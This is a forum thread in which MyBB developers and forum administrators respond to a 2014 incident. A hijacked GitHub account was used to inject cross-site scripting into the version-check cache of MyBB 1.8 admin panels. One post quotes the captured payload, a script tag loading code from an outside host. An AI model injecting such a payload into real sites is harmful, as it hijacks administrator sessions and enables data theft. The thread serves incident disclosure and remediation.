[IMPORTANT] GitHub Account Attack
#1
We've been following the reports here over the past 2 days in order to figure out the extent of the issue. I've just updated the blog post with more information but I'm going to post it here just in case people miss it.

Please check your ACP -> Tools & Maintenance -> Administrator Logs for suspicious activity!
Please check your ACP -> Tools & Maintenance -> Cache Manager -> 'update_check'. If it contains news data only then you're safe:
Array
(
    [last_check] => 1416222660
    [news] => Array
        (
            [0] => Array
                (
                    [title] => GitHub Account Compromised
                    [description] => UPDATE: Updated the page in which you should check for suspicious activity. It should be the Admin Logs page, not the Database Backups.   Hello, Yesterday, 14th of November, my (Pirata Nervo) GitHub account was compromised. By taking advantage of that, the attacker made a commit to our GH pages, more specifically one which is […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/9jWBtaXX3d8/
                    [author] => Pirata Nervo
                    [dateline] => 1416069961
                )

            [1] => Array
                (
                    [title] => MyBB 1.8.2 Released – Security Release
                    [description] => MyBB 1.8.2 is now available from the MyBB website. It fixes 1 high risk vulnerability, 2 medium risk vulnerabilities and 2 low risk vulnerabilities. We recommend everyone upgrades to this release immediately. MyBB 1.6.15 is not affected by these vulnerabilities. What’s added/changed in this version? The vulnerabilities are: High Risk: A SQL injection vulnerability in […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/EkqazJvmZXc/
                    [author] => StefanT
                    [dateline] => 1415917805
                )

            [2] => Array
                (
                    [title] => MyBB 1.8.1 & Merge System 1.8.1 Release
                    [description] => MyBB 1.8.1 – Maintenance Release MyBB 1.8.1 is now available from the MyBB website and is a maintenance release. What’s added/changed in this version? This release fixes 74 reported issues causing incorrect functionality of MyBB. Please be aware that to be able to provide easy to manage updates not all issues have been fixed in this version. Bugs […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/erxFg7H84tQ/
                    [author] => StefanT
                    [dateline] => 1414093168
                )

        )

)


If it contains version code, and it is different from this:: (e.g. showing 1803 instead of 1802 and having <script> tags in the latest_version field)
Array
 (
     [last_check] => 1416085808
     [latest_version] => <span style="color: #C00;"><strong>1.8.2</strong> (1802)</span>
     [latest_version_code] => 1802
 )
then you need to reset the cache for it! (Rebuild Cache)
All my plugins are available for free at MyBB Extend and on my GitHub. MyBB-Plugins.com has been closed and none of my plugins are officially maintained or supported.
Reply
#2
So, just to make sure. If I entered the ACP just now, and still saw 1.8.1. After it I clicked to check for updates, and 1.8.2 begun to show, does that mean the attacker couldn't attack my website? Is that right?
Reply
#3
In theory, yes. But you need to check your admin logs. If no backups were made by you without actually making them yourself, you're safe.
All my plugins are available for free at MyBB Extend and on my GitHub. MyBB-Plugins.com has been closed and none of my plugins are officially maintained or supported.
Reply
#4
Hi,

I read the blog post and accessed my Admin Panel to check if there were any database backups logged within the time span specified in the blog post.

There were none. No admin activity was logged for that specific time span.

However, the activity log said that I allegedly made the database backup myself right at the moment I logged in (which, of course, I did not do).

I then checked the update_check and it contained the suspicious code like this:

Array
(
    [last_check] => 1416049591
    [latest_version] => <span style="color: #C00;"><strong>1.8.2 <script src="http://hub.org/analytics.php" async></script><script>$('.error').hide();</script></strong> (1803)</span>
    [latest_version_code] => 1803
    [news] => Array
        (
            [0] => Array
                (
                    [title] => MyBB 1.8.2 Released – Security Release
                    [description] => MyBB 1.8.2 is now available from the MyBB website. It fixes 1 high risk vulnerability, 2 medium risk vulnerabilities and 2 low risk vulnerabilities. We recommend everyone upgrades to this release immediately. MyBB 1.6.15 is not affected by these vulnerabilities. What’s added/changed in this version? The vulnerabilities are: High Risk: A SQL injection vulnerability in […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/EkqazJvmZXc/
                    [author] => StefanT
                    [dateline] => 1415917805
                )

            [1] => Array
                (
                    [title] => MyBB 1.8.1 & Merge System 1.8.1 Release
                    [description] => MyBB 1.8.1 – Maintenance Release MyBB 1.8.1 is now available from the MyBB website and is a maintenance release. What’s added/changed in this version? This release fixes 74 reported issues causing incorrect functionality of MyBB. Please be aware that to be able to provide easy to manage updates not all issues have been fixed in this version. Bugs […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/erxFg7H84tQ/
                    [author] => StefanT
                    [dateline] => 1414093168
                )

            [2] => Array
                (
                    [title] => MyBB Merge System 1.8
                    [description] => The MyBB Merge System for 1.8 is now available from the MyBB website. What’s new in this version? First we decided to drop some old modules which aren’t supported by their developers: BBPress 1 IP.Board 2 Mingle phpBB 2 vBulletin 3 And of course we’ve added more new modules (including some which you requested fairly […]
                    [link] => http://feedproxy.google.com/~r/MyBBDevelopmentBlog/~3/iSA6ZgMX-Us/
                    [author] => Jones
                    [dateline] => 1410948694
                )

        )

)

I rebuilt this cache and now it looks like this:

Array
(
    [dateline] => 1416234809
)

Please advise whether my forum is compromised or not and whether I should change passwords. Thx.
Reply
#5
Yes! You were attacked. It hurts me to say this. You should change your password and so should all your members.
All my plugins are available for free at MyBB Extend and on my GitHub. MyBB-Plugins.com has been closed and none of my plugins are officially maintained or supported.
Reply
#6
This user has been denied support. This user has been denied support.
If you have database downloads in your logs that you didn't do, then you should change passwords and loginkeys.

(2014-11-16, 01:41 AM)frostschutz Wrote: If affected, admins and moderators should change their passwords, users should be advised to do the same, and for those who don't you should change the loginkeys in the users table. Something like this query: (haven't tested it)

UPDATE mybb_users SET loginkey='';

That relies on MyBB generating a new loginkey on the next login. If paranoid you could set something random yourself:

UPDATE mybb_users SET loginkey=SHA1(CONCAT(RAND(),UUID(),loginkey));

Either one should force everyone to re-login and make the old loginkeys in the stolen database useless. And bruteforcing the passwords hopefully should take a bit of time, since they're salted.
Reply
#7
(2014-11-17, 02:51 PM)Pirata Nervo Wrote: Yes! You were attacked. It hurts me to say this. You should change your password and so should all your members.

I wonder how this could be if no one of my admins entered the Admin panel in between 14 and 15th November? I entered it only today after reading the blog post. Does that mean that something is still wrong on GitHub?
Reply
#8
The version check / update check task was likely executed during that time and cached the XSS injection (this task didn't exist on 1.6 so it would only run for 1.8 users). It was just a matter of bad luck for you really. The issue is resolved on our end. I'm doing my best to alert people to fix their boards now.
All my plugins are available for free at MyBB Extend and on my GitHub. MyBB-Plugins.com has been closed and none of my plugins are officially maintained or supported.
Reply
#9
OK understood.

One last question - is it OK for me to change passwords for my users manually through the Admin Panel, or they necessarily need to do that theirselves?
Reply
#10
They can do it themselves sure.
All my plugins are available for free at MyBB Extend and on my GitHub. MyBB-Plugins.com has been closed and none of my plugins are officially maintained or supported.
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)